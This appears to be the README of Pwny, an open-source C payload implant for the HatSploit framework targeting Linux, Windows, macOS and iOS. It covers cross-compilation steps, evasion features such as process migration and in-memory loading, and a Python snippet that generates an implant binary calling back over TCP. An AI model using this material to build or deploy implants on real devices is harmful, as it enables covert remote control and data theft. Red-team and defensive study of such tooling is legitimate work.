Friendly like a Pony, Mighty like a Knight
Pwny is an implementation of an advanced payload written in pure C and designed for portability and extensibility.
This repository contains Pwny, which is supposed to work on macOS, Linux, Windows and iOS, but can be ported to almost every POSIX system. Pwny is optimized to work with or without HatSploit Framework.
- Portable C code that can be compiled for a big range of targets.
- Support for macOS, Linux, Windows and iOS targets.
- Small executable with low resource utilization optimized for embedded systems.
- Dynamically-extendable, supports loading plugins (TABs) which extend its functionality.
- Evasion techniques such as process migration and in-memory loading.
To install Pwny you simply need to install HatSploit Framework and this will make Pwny available automatically.
pip3 install git+https://github.com/EntySec/HatSploit
Building dependencies:
make TARGET=<target>
NOTE: For macOS / iOS targets you are required to set SDK
to the desired SDK path before running make
. For example:
make TARGET=<target> SDK=<path>
You can find list of supported TARGET
values for different platforms.
Linux
aarch64-linux-musl
armv5l-linux-musleabi
i486-linux-musl
x86_64-linux-musl
powerpc-linux-muslsf
powerpc64le-linux-musl
mips-linux-muslsf
mipsel-linux-muslsf
mips64-linux-musl
s390x-linux-musl
Windows
x86_64-w64-mingw32
x86_64-w64-mingw32
macOS / iOS
arm-iphone-darwin
aarch64-iphone-darwin
i386-apple-darwin
x86_64-apple-darwin
aarch64-apple-darwin
Building sources:
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -B build
cmake --build build
NOTE: For macOS / iOS targets you are required to set CMAKE_OSX_SYSROOT
to the desired SDK path with -D
. For example:
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -DCMAKE_OSX_SYSROOT=<path> -B build
NOTE: Toolchains are located at toolchain/cmake/
.
These are other cmake
build options:
MAIN
- Should beON
if you want to build a source file to executable.SOURCE
- Custom executable source file (default are insrc/main/
).DEBUG
- Should beON
if you want to build Pwny in debug mode.BUNDLE
- Build as bundle (macOS specific flag, adds-bundle
)SHARED
- Build shared object instead.
Quick scripts:
cross.sh
- Install Linux cross-compilers to/etc/cross/
.build-linux.sh
- Build Pwny for all Linux targets and deploy topwny/templates/
.
To use Pwny and build payloads you should import it to your source.
from pwny import Pwny
from pwny.session import PwnySession
Pwny
- Pwny object that is used to generate payload implant.
pwny = Pwny(
target='aarch64-apple-darwin',
options={
'uri': 'tcp://127.0.0.1:8888'
}
)
with open('payload.exe', 'wb') as f:
f.write(pwny.to_binary())
PwnySession
- Wrapper forHatSploitSession
for Pwny, HatSploit should use it with Pwny payload. It might also be used without HatSploit as demonstrated inexamples/listener.py
.
- SeaShell Framework - iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information. SeaShell actively uses Pwny implant to communicate with iOS.
The code provided in this repository has not yet been prepared for use in a production environment. It can be improved, so any contribution is welcome. You can even experience memory leaks, so we'll be glad to accept every single PR which is fixing a potential issue.